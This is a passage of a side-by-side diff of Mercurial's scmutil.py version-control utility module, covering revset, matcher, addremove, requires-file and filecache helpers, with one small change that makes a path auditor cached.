454 The revsets specified by ``specs`` will be executed via a chained ``OR``
455 expression. If ``specs`` is empty, an empty result is returned.
455 expression. If ``specs`` is empty, an empty result is returned.
456
456
457 ``specs`` can contain integers, in which case they are assumed to be
457 ``specs`` can contain integers, in which case they are assumed to be
458 revision numbers.
458 revision numbers.
459
459
460 It is assumed the revsets are already formatted. If you have arguments
460 It is assumed the revsets are already formatted. If you have arguments
461 that need to be expanded in the revset, call ``revsetlang.formatspec()``
461 that need to be expanded in the revset, call ``revsetlang.formatspec()``
462 and pass the result as an element of ``specs``.
462 and pass the result as an element of ``specs``.
463
463
464 Specifying a single revset is allowed.
464 Specifying a single revset is allowed.
465
465
466 Returns a ``revset.abstractsmartset`` which is a list-like interface over
466 Returns a ``revset.abstractsmartset`` which is a list-like interface over
467 integer revisions.
467 integer revisions.
468 """
468 """
469 allspecs = []
469 allspecs = []
470 for spec in specs:
470 for spec in specs:
471 if isinstance(spec, int):
471 if isinstance(spec, int):
472 spec = revsetlang.formatspec('rev(%d)', spec)
472 spec = revsetlang.formatspec('rev(%d)', spec)
473 allspecs.append(spec)
473 allspecs.append(spec)
474 return repo.anyrevs(allspecs, user=True)
474 return repo.anyrevs(allspecs, user=True)
475
475
476 def meaningfulparents(repo, ctx):
476 def meaningfulparents(repo, ctx):
477 """Return list of meaningful (or all if debug) parentrevs for rev.
477 """Return list of meaningful (or all if debug) parentrevs for rev.
478
478
479 For merges (two non-nullrev revisions) both parents are meaningful.
479 For merges (two non-nullrev revisions) both parents are meaningful.
480 Otherwise the first parent revision is considered meaningful if it
480 Otherwise the first parent revision is considered meaningful if it
481 is not the preceding revision.
481 is not the preceding revision.
482 """
482 """
483 parents = ctx.parents()
483 parents = ctx.parents()
484 if len(parents) > 1:
484 if len(parents) > 1:
485 return parents
485 return parents
486 if repo.ui.debugflag:
486 if repo.ui.debugflag:
487 return [parents[0], repo['null']]
487 return [parents[0], repo['null']]
488 if parents[0].rev() >= intrev(ctx) - 1:
488 if parents[0].rev() >= intrev(ctx) - 1:
489 return []
489 return []
490 return parents
490 return parents
491
491
492 def expandpats(pats):
492 def expandpats(pats):
493 '''Expand bare globs when running on windows.
493 '''Expand bare globs when running on windows.
494 On posix we assume it already has already been done by sh.'''
494 On posix we assume it already has already been done by sh.'''
495 if not util.expandglobs:
495 if not util.expandglobs:
496 return list(pats)
496 return list(pats)
497 ret = []
497 ret = []
498 for kindpat in pats:
498 for kindpat in pats:
499 kind, pat = matchmod._patsplit(kindpat, None)
499 kind, pat = matchmod._patsplit(kindpat, None)
500 if kind is None:
500 if kind is None:
501 try:
501 try:
502 globbed = glob.glob(pat)
502 globbed = glob.glob(pat)
503 except re.error:
503 except re.error:
504 globbed = [pat]
504 globbed = [pat]
505 if globbed:
505 if globbed:
506 ret.extend(globbed)
506 ret.extend(globbed)
507 continue
507 continue
508 ret.append(kindpat)
508 ret.append(kindpat)
509 return ret
509 return ret
510
510
511 def matchandpats(ctx, pats=(), opts=None, globbed=False, default='relpath',
511 def matchandpats(ctx, pats=(), opts=None, globbed=False, default='relpath',
512 badfn=None):
512 badfn=None):
513 '''Return a matcher and the patterns that were used.
513 '''Return a matcher and the patterns that were used.
514 The matcher will warn about bad matches, unless an alternate badfn callback
514 The matcher will warn about bad matches, unless an alternate badfn callback
515 is provided.'''
515 is provided.'''
516 if pats == ("",):
516 if pats == ("",):
517 pats = []
517 pats = []
518 if opts is None:
518 if opts is None:
519 opts = {}
519 opts = {}
520 if not globbed and default == 'relpath':
520 if not globbed and default == 'relpath':
521 pats = expandpats(pats or [])
521 pats = expandpats(pats or [])
522
522
523 def bad(f, msg):
523 def bad(f, msg):
524 ctx.repo().ui.warn("%s: %s\n" % (m.rel(f), msg))
524 ctx.repo().ui.warn("%s: %s\n" % (m.rel(f), msg))
525
525
526 if badfn is None:
526 if badfn is None:
527 badfn = bad
527 badfn = bad
528
528
529 m = ctx.match(pats, opts.get('include'), opts.get('exclude'),
529 m = ctx.match(pats, opts.get('include'), opts.get('exclude'),
530 default, listsubrepos=opts.get('subrepos'), badfn=badfn)
530 default, listsubrepos=opts.get('subrepos'), badfn=badfn)
531
531
532 if m.always():
532 if m.always():
533 pats = []
533 pats = []
534 return m, pats
534 return m, pats
535
535
536 def match(ctx, pats=(), opts=None, globbed=False, default='relpath',
536 def match(ctx, pats=(), opts=None, globbed=False, default='relpath',
537 badfn=None):
537 badfn=None):
538 '''Return a matcher that will warn about bad matches.'''
538 '''Return a matcher that will warn about bad matches.'''
539 return matchandpats(ctx, pats, opts, globbed, default, badfn=badfn)[0]
539 return matchandpats(ctx, pats, opts, globbed, default, badfn=badfn)[0]
540
540
541 def matchall(repo):
541 def matchall(repo):
542 '''Return a matcher that will efficiently match everything.'''
542 '''Return a matcher that will efficiently match everything.'''
543 return matchmod.always(repo.root, repo.getcwd())
543 return matchmod.always(repo.root, repo.getcwd())
544
544
545 def matchfiles(repo, files, badfn=None):
545 def matchfiles(repo, files, badfn=None):
546 '''Return a matcher that will efficiently match exactly these files.'''
546 '''Return a matcher that will efficiently match exactly these files.'''
547 return matchmod.exact(repo.root, repo.getcwd(), files, badfn=badfn)
547 return matchmod.exact(repo.root, repo.getcwd(), files, badfn=badfn)
548
548
549 def origpath(ui, repo, filepath):
549 def origpath(ui, repo, filepath):
550 '''customize where .orig files are created
550 '''customize where .orig files are created
551
551
552 Fetch user defined path from config file: [ui] origbackuppath = <path>
552 Fetch user defined path from config file: [ui] origbackuppath = <path>
553 Fall back to default (filepath) if not specified
553 Fall back to default (filepath) if not specified
554 '''
554 '''
555 origbackuppath = ui.config('ui', 'origbackuppath')
555 origbackuppath = ui.config('ui', 'origbackuppath')
556 if origbackuppath is None:
556 if origbackuppath is None:
557 return filepath + ".orig"
557 return filepath + ".orig"
558
558
559 filepathfromroot = os.path.relpath(filepath, start=repo.root)
559 filepathfromroot = os.path.relpath(filepath, start=repo.root)
560 fullorigpath = repo.wjoin(origbackuppath, filepathfromroot)
560 fullorigpath = repo.wjoin(origbackuppath, filepathfromroot)
561
561
562 origbackupdir = repo.vfs.dirname(fullorigpath)
562 origbackupdir = repo.vfs.dirname(fullorigpath)
563 if not repo.vfs.exists(origbackupdir):
563 if not repo.vfs.exists(origbackupdir):
564 ui.note(_('creating directory: %s\n') % origbackupdir)
564 ui.note(_('creating directory: %s\n') % origbackupdir)
565 util.makedirs(origbackupdir)
565 util.makedirs(origbackupdir)
566
566
567 return fullorigpath + ".orig"
567 return fullorigpath + ".orig"
568
568
569 class _containsnode(object):
569 class _containsnode(object):
570 """proxy __contains__(node) to container.__contains__ which accepts revs"""
570 """proxy __contains__(node) to container.__contains__ which accepts revs"""
571
571
572 def __init__(self, repo, revcontainer):
572 def __init__(self, repo, revcontainer):
573 self._torev = repo.changelog.rev
573 self._torev = repo.changelog.rev
574 self._revcontains = revcontainer.__contains__
574 self._revcontains = revcontainer.__contains__
575
575
576 def __contains__(self, node):
576 def __contains__(self, node):
577 return self._revcontains(self._torev(node))
577 return self._revcontains(self._torev(node))
578
578
579 def cleanupnodes(repo, mapping, operation):
579 def cleanupnodes(repo, mapping, operation):
580 """do common cleanups when old nodes are replaced by new nodes
580 """do common cleanups when old nodes are replaced by new nodes
581
581
582 That includes writing obsmarkers or stripping nodes, and moving bookmarks.
582 That includes writing obsmarkers or stripping nodes, and moving bookmarks.
583 (we might also want to move working directory parent in the future)
583 (we might also want to move working directory parent in the future)
584
584
585 mapping is {oldnode: [newnode]} or a iterable of nodes if they do not have
585 mapping is {oldnode: [newnode]} or a iterable of nodes if they do not have
586 replacements. operation is a string, like "rebase".
586 replacements. operation is a string, like "rebase".
587 """
587 """
588 if not util.safehasattr(mapping, 'items'):
588 if not util.safehasattr(mapping, 'items'):
589 mapping = {n: () for n in mapping}
589 mapping = {n: () for n in mapping}
590
590
591 with repo.transaction('cleanup') as tr:
591 with repo.transaction('cleanup') as tr:
592 # Move bookmarks
592 # Move bookmarks
593 bmarks = repo._bookmarks
593 bmarks = repo._bookmarks
594 bmarkchanges = []
594 bmarkchanges = []
595 allnewnodes = [n for ns in mapping.values() for n in ns]
595 allnewnodes = [n for ns in mapping.values() for n in ns]
596 for oldnode, newnodes in mapping.items():
596 for oldnode, newnodes in mapping.items():
597 oldbmarks = repo.nodebookmarks(oldnode)
597 oldbmarks = repo.nodebookmarks(oldnode)
598 if not oldbmarks:
598 if not oldbmarks:
599 continue
599 continue
600 from . import bookmarks # avoid import cycle
600 from . import bookmarks # avoid import cycle
601 if len(newnodes) > 1:
601 if len(newnodes) > 1:
602 # usually a split, take the one with biggest rev number
602 # usually a split, take the one with biggest rev number
603 newnode = next(repo.set('max(%ln)', newnodes)).node()
603 newnode = next(repo.set('max(%ln)', newnodes)).node()
604 elif len(newnodes) == 0:
604 elif len(newnodes) == 0:
605 # move bookmark backwards
605 # move bookmark backwards
606 roots = list(repo.set('max((::%n) - %ln)', oldnode,
606 roots = list(repo.set('max((::%n) - %ln)', oldnode,
607 list(mapping)))
607 list(mapping)))
608 if roots:
608 if roots:
609 newnode = roots[0].node()
609 newnode = roots[0].node()
610 else:
610 else:
611 newnode = nullid
611 newnode = nullid
612 else:
612 else:
613 newnode = newnodes[0]
613 newnode = newnodes[0]
614 repo.ui.debug('moving bookmarks %r from %s to %s\n' %
614 repo.ui.debug('moving bookmarks %r from %s to %s\n' %
615 (oldbmarks, hex(oldnode), hex(newnode)))
615 (oldbmarks, hex(oldnode), hex(newnode)))
616 # Delete divergent bookmarks being parents of related newnodes
616 # Delete divergent bookmarks being parents of related newnodes
617 deleterevs = repo.revs('parents(roots(%ln & (::%n))) - parents(%n)',
617 deleterevs = repo.revs('parents(roots(%ln & (::%n))) - parents(%n)',
618 allnewnodes, newnode, oldnode)
618 allnewnodes, newnode, oldnode)
619 deletenodes = _containsnode(repo, deleterevs)
619 deletenodes = _containsnode(repo, deleterevs)
620 for name in oldbmarks:
620 for name in oldbmarks:
621 bmarkchanges.append((name, newnode))
621 bmarkchanges.append((name, newnode))
622 for b in bookmarks.divergent2delete(repo, deletenodes, name):
622 for b in bookmarks.divergent2delete(repo, deletenodes, name):
623 bmarkchanges.append((b, None))
623 bmarkchanges.append((b, None))
624
624
625 if bmarkchanges:
625 if bmarkchanges:
626 bmarks.applychanges(repo, tr, bmarkchanges)
626 bmarks.applychanges(repo, tr, bmarkchanges)
627
627
628 # Obsolete or strip nodes
628 # Obsolete or strip nodes
629 if obsolete.isenabled(repo, obsolete.createmarkersopt):
629 if obsolete.isenabled(repo, obsolete.createmarkersopt):
630 # If a node is already obsoleted, and we want to obsolete it
630 # If a node is already obsoleted, and we want to obsolete it
631 # without a successor, skip that obssolete request since it's
631 # without a successor, skip that obssolete request since it's
632 # unnecessary. That's the "if s or not isobs(n)" check below.
632 # unnecessary. That's the "if s or not isobs(n)" check below.
633 # Also sort the node in topology order, that might be useful for
633 # Also sort the node in topology order, that might be useful for
634 # some obsstore logic.
634 # some obsstore logic.
635 # NOTE: the filtering and sorting might belong to createmarkers.
635 # NOTE: the filtering and sorting might belong to createmarkers.
636 # Unfiltered repo is needed since nodes in mapping might be hidden.
636 # Unfiltered repo is needed since nodes in mapping might be hidden.
637 unfi = repo.unfiltered()
637 unfi = repo.unfiltered()
638 isobs = unfi.obsstore.successors.__contains__
638 isobs = unfi.obsstore.successors.__contains__
639 torev = unfi.changelog.rev
639 torev = unfi.changelog.rev
640 sortfunc = lambda ns: torev(ns[0])
640 sortfunc = lambda ns: torev(ns[0])
641 rels = [(unfi[n], tuple(unfi[m] for m in s))
641 rels = [(unfi[n], tuple(unfi[m] for m in s))
642 for n, s in sorted(mapping.items(), key=sortfunc)
642 for n, s in sorted(mapping.items(), key=sortfunc)
643 if s or not isobs(n)]
643 if s or not isobs(n)]
644 obsolete.createmarkers(repo, rels, operation=operation)
644 obsolete.createmarkers(repo, rels, operation=operation)
645 else:
645 else:
646 from . import repair # avoid import cycle
646 from . import repair # avoid import cycle
647 repair.delayedstrip(repo.ui, repo, list(mapping), operation)
647 repair.delayedstrip(repo.ui, repo, list(mapping), operation)
648
648
649 def addremove(repo, matcher, prefix, opts=None, dry_run=None, similarity=None):
649 def addremove(repo, matcher, prefix, opts=None, dry_run=None, similarity=None):
650 if opts is None:
650 if opts is None:
651 opts = {}
651 opts = {}
652 m = matcher
652 m = matcher
653 if dry_run is None:
653 if dry_run is None:
654 dry_run = opts.get('dry_run')
654 dry_run = opts.get('dry_run')
655 if similarity is None:
655 if similarity is None:
656 similarity = float(opts.get('similarity') or 0)
656 similarity = float(opts.get('similarity') or 0)
657
657
658 ret = 0
658 ret = 0
659 join = lambda f: os.path.join(prefix, f)
659 join = lambda f: os.path.join(prefix, f)
660
660
661 wctx = repo[None]
661 wctx = repo[None]
662 for subpath in sorted(wctx.substate):
662 for subpath in sorted(wctx.substate):
663 submatch = matchmod.subdirmatcher(subpath, m)
663 submatch = matchmod.subdirmatcher(subpath, m)
664 if opts.get('subrepos') or m.exact(subpath) or any(submatch.files()):
664 if opts.get('subrepos') or m.exact(subpath) or any(submatch.files()):
665 sub = wctx.sub(subpath)
665 sub = wctx.sub(subpath)
666 try:
666 try:
667 if sub.addremove(submatch, prefix, opts, dry_run, similarity):
667 if sub.addremove(submatch, prefix, opts, dry_run, similarity):
668 ret = 1
668 ret = 1
669 except error.LookupError:
669 except error.LookupError:
670 repo.ui.status(_("skipping missing subrepository: %s\n")
670 repo.ui.status(_("skipping missing subrepository: %s\n")
671 % join(subpath))
671 % join(subpath))
672
672
673 rejected = []
673 rejected = []
674 def badfn(f, msg):
674 def badfn(f, msg):
675 if f in m.files():
675 if f in m.files():
676 m.bad(f, msg)
676 m.bad(f, msg)
677 rejected.append(f)
677 rejected.append(f)
678
678
679 badmatch = matchmod.badmatch(m, badfn)
679 badmatch = matchmod.badmatch(m, badfn)
680 added, unknown, deleted, removed, forgotten = _interestingfiles(repo,
680 added, unknown, deleted, removed, forgotten = _interestingfiles(repo,
681 badmatch)
681 badmatch)
682
682
683 unknownset = set(unknown + forgotten)
683 unknownset = set(unknown + forgotten)
684 toprint = unknownset.copy()
684 toprint = unknownset.copy()
685 toprint.update(deleted)
685 toprint.update(deleted)
686 for abs in sorted(toprint):
686 for abs in sorted(toprint):
687 if repo.ui.verbose or not m.exact(abs):
687 if repo.ui.verbose or not m.exact(abs):
688 if abs in unknownset:
688 if abs in unknownset:
689 status = _('adding %s\n') % m.uipath(abs)
689 status = _('adding %s\n') % m.uipath(abs)
690 else:
690 else:
691 status = _('removing %s\n') % m.uipath(abs)
691 status = _('removing %s\n') % m.uipath(abs)
692 repo.ui.status(status)
692 repo.ui.status(status)
693
693
694 renames = _findrenames(repo, m, added + unknown, removed + deleted,
694 renames = _findrenames(repo, m, added + unknown, removed + deleted,
695 similarity)
695 similarity)
696
696
697 if not dry_run:
697 if not dry_run:
698 _markchanges(repo, unknown + forgotten, deleted, renames)
698 _markchanges(repo, unknown + forgotten, deleted, renames)
699
699
700 for f in rejected:
700 for f in rejected:
701 if f in m.files():
701 if f in m.files():
702 return 1
702 return 1
703 return ret
703 return ret
704
704
705 def marktouched(repo, files, similarity=0.0):
705 def marktouched(repo, files, similarity=0.0):
706 '''Assert that files have somehow been operated upon. files are relative to
706 '''Assert that files have somehow been operated upon. files are relative to
707 the repo root.'''
707 the repo root.'''
708 m = matchfiles(repo, files, badfn=lambda x, y: rejected.append(x))
708 m = matchfiles(repo, files, badfn=lambda x, y: rejected.append(x))
709 rejected = []
709 rejected = []
710
710
711 added, unknown, deleted, removed, forgotten = _interestingfiles(repo, m)
711 added, unknown, deleted, removed, forgotten = _interestingfiles(repo, m)
712
712
713 if repo.ui.verbose:
713 if repo.ui.verbose:
714 unknownset = set(unknown + forgotten)
714 unknownset = set(unknown + forgotten)
715 toprint = unknownset.copy()
715 toprint = unknownset.copy()
716 toprint.update(deleted)
716 toprint.update(deleted)
717 for abs in sorted(toprint):
717 for abs in sorted(toprint):
718 if abs in unknownset:
718 if abs in unknownset:
719 status = _('adding %s\n') % abs
719 status = _('adding %s\n') % abs
720 else:
720 else:
721 status = _('removing %s\n') % abs
721 status = _('removing %s\n') % abs
722 repo.ui.status(status)
722 repo.ui.status(status)
723
723
724 renames = _findrenames(repo, m, added + unknown, removed + deleted,
724 renames = _findrenames(repo, m, added + unknown, removed + deleted,
725 similarity)
725 similarity)
726
726
727 _markchanges(repo, unknown + forgotten, deleted, renames)
727 _markchanges(repo, unknown + forgotten, deleted, renames)
728
728
729 for f in rejected:
729 for f in rejected:
730 if f in m.files():
730 if f in m.files():
731 return 1
731 return 1
732 return 0
732 return 0
733
733
734 def _interestingfiles(repo, matcher):
734 def _interestingfiles(repo, matcher):
735 '''Walk dirstate with matcher, looking for files that addremove would care
735 '''Walk dirstate with matcher, looking for files that addremove would care
736 about.
736 about.
737
737
738 This is different from dirstate.status because it doesn't care about
738 This is different from dirstate.status because it doesn't care about
739 whether files are modified or clean.'''
739 whether files are modified or clean.'''
740 added, unknown, deleted, removed, forgotten = [], [], [], [], []
740 added, unknown, deleted, removed, forgotten = [], [], [], [], []
741 audit_path = pathutil.pathauditor(repo.root)
741 audit_path = pathutil.pathauditor(repo.root, cached=True)
742
742
743 ctx = repo[None]
743 ctx = repo[None]
744 dirstate = repo.dirstate
744 dirstate = repo.dirstate
745 walkresults = dirstate.walk(matcher, sorted(ctx.substate), True, False,
745 walkresults = dirstate.walk(matcher, sorted(ctx.substate), True, False,
746 full=False)
746 full=False)
747 for abs, st in walkresults.iteritems():
747 for abs, st in walkresults.iteritems():
748 dstate = dirstate[abs]
748 dstate = dirstate[abs]
749 if dstate == '?' and audit_path.check(abs):
749 if dstate == '?' and audit_path.check(abs):
750 unknown.append(abs)
750 unknown.append(abs)
751 elif dstate != 'r' and not st:
751 elif dstate != 'r' and not st:
752 deleted.append(abs)
752 deleted.append(abs)
753 elif dstate == 'r' and st:
753 elif dstate == 'r' and st:
754 forgotten.append(abs)
754 forgotten.append(abs)
755 # for finding renames
755 # for finding renames
756 elif dstate == 'r' and not st:
756 elif dstate == 'r' and not st:
757 removed.append(abs)
757 removed.append(abs)
758 elif dstate == 'a':
758 elif dstate == 'a':
759 added.append(abs)
759 added.append(abs)
760
760
761 return added, unknown, deleted, removed, forgotten
761 return added, unknown, deleted, removed, forgotten
762
762
763 def _findrenames(repo, matcher, added, removed, similarity):
763 def _findrenames(repo, matcher, added, removed, similarity):
764 '''Find renames from removed files to added ones.'''
764 '''Find renames from removed files to added ones.'''
765 renames = {}
765 renames = {}
766 if similarity > 0:
766 if similarity > 0:
767 for old, new, score in similar.findrenames(repo, added, removed,
767 for old, new, score in similar.findrenames(repo, added, removed,
768 similarity):
768 similarity):
769 if (repo.ui.verbose or not matcher.exact(old)
769 if (repo.ui.verbose or not matcher.exact(old)
770 or not matcher.exact(new)):
770 or not matcher.exact(new)):
771 repo.ui.status(_('recording removal of %s as rename to %s '
771 repo.ui.status(_('recording removal of %s as rename to %s '
772 '(%d%% similar)\n') %
772 '(%d%% similar)\n') %
773 (matcher.rel(old), matcher.rel(new),
773 (matcher.rel(old), matcher.rel(new),
774 score * 100))
774 score * 100))
775 renames[new] = old
775 renames[new] = old
776 return renames
776 return renames
777
777
778 def _markchanges(repo, unknown, deleted, renames):
778 def _markchanges(repo, unknown, deleted, renames):
779 '''Marks the files in unknown as added, the files in deleted as removed,
779 '''Marks the files in unknown as added, the files in deleted as removed,
780 and the files in renames as copied.'''
780 and the files in renames as copied.'''
781 wctx = repo[None]
781 wctx = repo[None]
782 with repo.wlock():
782 with repo.wlock():
783 wctx.forget(deleted)
783 wctx.forget(deleted)
784 wctx.add(unknown)
784 wctx.add(unknown)
785 for new, old in renames.iteritems():
785 for new, old in renames.iteritems():
786 wctx.copy(old, new)
786 wctx.copy(old, new)
787
787
788 def dirstatecopy(ui, repo, wctx, src, dst, dryrun=False, cwd=None):
788 def dirstatecopy(ui, repo, wctx, src, dst, dryrun=False, cwd=None):
789 """Update the dirstate to reflect the intent of copying src to dst. For
789 """Update the dirstate to reflect the intent of copying src to dst. For
790 different reasons it might not end with dst being marked as copied from src.
790 different reasons it might not end with dst being marked as copied from src.
791 """
791 """
792 origsrc = repo.dirstate.copied(src) or src
792 origsrc = repo.dirstate.copied(src) or src
793 if dst == origsrc: # copying back a copy?
793 if dst == origsrc: # copying back a copy?
794 if repo.dirstate[dst] not in 'mn' and not dryrun:
794 if repo.dirstate[dst] not in 'mn' and not dryrun:
795 repo.dirstate.normallookup(dst)
795 repo.dirstate.normallookup(dst)
796 else:
796 else:
797 if repo.dirstate[origsrc] == 'a' and origsrc == src:
797 if repo.dirstate[origsrc] == 'a' and origsrc == src:
798 if not ui.quiet:
798 if not ui.quiet:
799 ui.warn(_("%s has not been committed yet, so no copy "
799 ui.warn(_("%s has not been committed yet, so no copy "
800 "data will be stored for %s.\n")
800 "data will be stored for %s.\n")
801 % (repo.pathto(origsrc, cwd), repo.pathto(dst, cwd)))
801 % (repo.pathto(origsrc, cwd), repo.pathto(dst, cwd)))
802 if repo.dirstate[dst] in '?r' and not dryrun:
802 if repo.dirstate[dst] in '?r' and not dryrun:
803 wctx.add([dst])
803 wctx.add([dst])
804 elif not dryrun:
804 elif not dryrun:
805 wctx.copy(origsrc, dst)
805 wctx.copy(origsrc, dst)
806
806
807 def readrequires(opener, supported):
807 def readrequires(opener, supported):
808 '''Reads and parses .hg/requires and checks if all entries found
808 '''Reads and parses .hg/requires and checks if all entries found
809 are in the list of supported features.'''
809 are in the list of supported features.'''
810 requirements = set(opener.read("requires").splitlines())
810 requirements = set(opener.read("requires").splitlines())
811 missings = []
811 missings = []
812 for r in requirements:
812 for r in requirements:
813 if r not in supported:
813 if r not in supported:
814 if not r or not r[0].isalnum():
814 if not r or not r[0].isalnum():
815 raise error.RequirementError(_(".hg/requires file is corrupt"))
815 raise error.RequirementError(_(".hg/requires file is corrupt"))
816 missings.append(r)
816 missings.append(r)
817 missings.sort()
817 missings.sort()
818 if missings:
818 if missings:
819 raise error.RequirementError(
819 raise error.RequirementError(
820 _("repository requires features unknown to this Mercurial: %s")
820 _("repository requires features unknown to this Mercurial: %s")
821 % " ".join(missings),
821 % " ".join(missings),
822 hint=_("see https://mercurial-scm.org/wiki/MissingRequirement"
822 hint=_("see https://mercurial-scm.org/wiki/MissingRequirement"
823 " for more information"))
823 " for more information"))
824 return requirements
824 return requirements
825
825
826 def writerequires(opener, requirements):
826 def writerequires(opener, requirements):
827 with opener('requires', 'w') as fp:
827 with opener('requires', 'w') as fp:
828 for r in sorted(requirements):
828 for r in sorted(requirements):
829 fp.write("%s\n" % r)
829 fp.write("%s\n" % r)
830
830
831 class filecachesubentry(object):
831 class filecachesubentry(object):
832 def __init__(self, path, stat):
832 def __init__(self, path, stat):
833 self.path = path
833 self.path = path
834 self.cachestat = None
834 self.cachestat = None
835 self._cacheable = None
835 self._cacheable = None
836
836
837 if stat:
837 if stat:
838 self.cachestat = filecachesubentry.stat(self.path)
838 self.cachestat = filecachesubentry.stat(self.path)
839
839
840 if self.cachestat:
840 if self.cachestat:
841 self._cacheable = self.cachestat.cacheable()
841 self._cacheable = self.cachestat.cacheable()
842 else:
842 else:
843 # None means we don't know yet
843 # None means we don't know yet
844 self._cacheable = None
844 self._cacheable = None
845
845
846 def refresh(self):
846 def refresh(self):
847 if self.cacheable():
847 if self.cacheable():
848 self.cachestat = filecachesubentry.stat(self.path)
848 self.cachestat = filecachesubentry.stat(self.path)
849
849
850 def cacheable(self):
850 def cacheable(self):
851 if self._cacheable is not None:
851 if self._cacheable is not None:
852 return self._cacheable
852 return self._cacheable
853
853
854 # we don't know yet, assume it is for now
854 # we don't know yet, assume it is for now
855 return True
855 return True
856
856
857 def changed(self):
857 def changed(self):
858 # no point in going further if we can't cache it
858 # no point in going further if we can't cache it
859 if not self.cacheable():
859 if not self.cacheable():
860 return True
860 return True
861
861
862 newstat = filecachesubentry.stat(self.path)
862 newstat = filecachesubentry.stat(self.path)
863
863
864 # we may not know if it's cacheable yet, check again now
864 # we may not know if it's cacheable yet, check again now
865 if newstat and self._cacheable is None:
865 if newstat and self._cacheable is None:
866 self._cacheable = newstat.cacheable()
866 self._cacheable = newstat.cacheable()
867
867
868 # check again
868 # check again
869 if not self._cacheable:
869 if not self._cacheable:
870 return True
870 return True
871
871
872 if self.cachestat != newstat:
872 if self.cachestat != newstat:
873 self.cachestat = newstat
873 self.cachestat = newstat
874 return True
874 return True
875 else:
875 else:
876 return False
876 return False
877
877
878 @staticmethod
878 @staticmethod
879 def stat(path):
879 def stat(path):
880 try:
880 try:
881 return util.cachestat(path)
881 return util.cachestat(path)
882 except OSError as e:
882 except OSError as e:
883 if e.errno != errno.ENOENT:
883 if e.errno != errno.ENOENT:
884 raise
884 raise
885
885
886 class filecacheentry(object):
886 class filecacheentry(object):
887 def __init__(self, paths, stat=True):
887 def __init__(self, paths, stat=True):
888 self._entries = []
888 self._entries = []
889 for path in paths:
889 for path in paths:
890 self._entries.append(filecachesubentry(path, stat))
890 self._entries.append(filecachesubentry(path, stat))
891
891
892 def changed(self):
892 def changed(self):
893 '''true if any entry has changed'''
893 '''true if any entry has changed'''
894 for entry in self._entries:
894 for entry in self._entries:
895 if entry.changed():
895 if entry.changed():
896 return True
896 return True
897 return False
897 return False
898
898
899 def refresh(self):
899 def refresh(self):
900 for entry in self._entries:
900 for entry in self._entries:
901 entry.refresh()
901 entry.refresh()
902
902
903 class filecache(object):
903 class filecache(object):
904 '''A property like decorator that tracks files under .hg/ for updates.
904 '''A property like decorator that tracks files under .hg/ for updates.
905
905
906 Records stat info when called in _filecache.
906 Records stat info when called in _filecache.
907
907
908 On subsequent calls, compares old stat info with new info, and recreates the
908 On subsequent calls, compares old stat info with new info, and recreates the
909 object when any of the files changes, updating the new stat info in
909 object when any of the files changes, updating the new stat info in
910 _filecache.
910 _filecache.
911
911
912 Mercurial either atomic renames or appends for files under .hg,
912 Mercurial either atomic renames or appends for files under .hg,
913 so to ensure the cache is reliable we need the filesystem to be able
913 so to ensure the cache is reliable we need the filesystem to be able
914 to tell us if a file has been replaced. If it can't, we fallback to
914 to tell us if a file has been replaced. If it can't, we fallback to
915 recreating the object on every call (essentially the same behavior as
915 recreating the object on every call (essentially the same behavior as
916 propertycache).
916 propertycache).
917
917
918 '''
918 '''
919 def __init__(self, *paths):
919 def __init__(self, *paths):
920 self.paths = paths
920 self.paths = paths
921
921
922 def join(self, obj, fname):
922 def join(self, obj, fname):
923 """Used to compute the runtime path of a cached file.
923 """Used to compute the runtime path of a cached file.
924
924
925 Users should subclass filecache and provide their own version of this
925 Users should subclass filecache and provide their own version of this
926 function to call the appropriate join function on 'obj' (an instance
926 function to call the appropriate join function on 'obj' (an instance
927 of the class that its member function was decorated).
927 of the class that its member function was decorated).
928 """
928 """
929 raise NotImplementedError
929 raise NotImplementedError
930
930
931 def __call__(self, func):
931 def __call__(self, func):
932 self.func = func
932 self.func = func
933 self.name = func.__name__.encode('ascii')
933 self.name = func.__name__.encode('ascii')
934 return self
934 return self
935
935
936 def __get__(self, obj, type=None):
936 def __get__(self, obj, type=None):
937 # if accessed on the class, return the descriptor itself.
937 # if accessed on the class, return the descriptor itself.
938 if obj is None:
938 if obj is None:
939 return self
939 return self
940 # do we need to check if the file changed?
940 # do we need to check if the file changed?
941 if self.name in obj.__dict__:
941 if self.name in obj.__dict__:
942 assert self.name in obj._filecache, self.name
942 assert self.name in obj._filecache, self.name
943 return obj.__dict__[self.name]
943 return obj.__dict__[self.name]
944
944
945 entry = obj._filecache.get(self.name)
945 entry = obj._filecache.get(self.name)
946
946
947 if entry:
947 if entry:
948 if entry.changed():
948 if entry.changed():
949 entry.obj = self.func(obj)
949 entry.obj = self.func(obj)
950 else:
950 else:
951 paths = [self.join(obj, path) for path in self.paths]
951 paths = [self.join(obj, path) for path in self.paths]
952
952
953 # We stat -before- creating the object so our cache doesn't lie if
953 # We stat -before- creating the object so our cache doesn't lie if
954 # a writer modified between the time we read and stat
954 # a writer modified between the time we read and stat
955 entry = filecacheentry(paths, True)
955 entry = filecacheentry(paths, True)
956 entry.obj = self.func(obj)
956 entry.obj = self.func(obj)
957
957
958 obj._filecache[self.name] = entry
958 obj._filecache[self.name] = entry
959
959
960 obj.__dict__[self.name] = entry.obj
960 obj.__dict__[self.name] = entry.obj
961 return entry.obj
961 return entry.obj
962
962
963 def __set__(self, obj, value):
963 def __set__(self, obj, value):
964 if self.name not in obj._filecache:
964 if self.name not in obj._filecache:
965 # we add an entry for the missing value because X in __dict__
965 # we add an entry for the missing value because X in __dict__
966 # implies X in _filecache
966 # implies X in _filecache
967 paths = [self.join(obj, path) for path in self.paths]
967 paths = [self.join(obj, path) for path in self.paths]
968 ce = filecacheentry(paths, False)
968 ce = filecacheentry(paths, False)
969 obj._filecache[self.name] = ce
969 obj._filecache[self.name] = ce
970 else:
970 else:
971 ce = obj._filecache[self.name]
971 ce = obj._filecache[self.name]
972
972
973 ce.obj = value # update cached copy
973 ce.obj = value # update cached copy
974 obj.__dict__[self.name] = value # update copy returned by obj.x
974 obj.__dict__[self.name] = value # update copy returned by obj.x
975
975
976 def __delete__(self, obj):
976 def __delete__(self, obj):
977 try:
977 try:
978 del obj.__dict__[self.name]
978 del obj.__dict__[self.name]
979 except KeyError:
979 except KeyError:
980 raise AttributeError(self.name)
980 raise AttributeError(self.name)
981
981
982 def _locksub(repo, lock, envvar, cmd, environ=None, *args, **kwargs):
982 def _locksub(repo, lock, envvar, cmd, environ=None, *args, **kwargs):
983 if lock is None:
983 if lock is None:
984 raise error.LockInheritanceContractViolation(
984 raise error.LockInheritanceContractViolation(
985 'lock can only be inherited while held')
985 'lock can only be inherited while held')
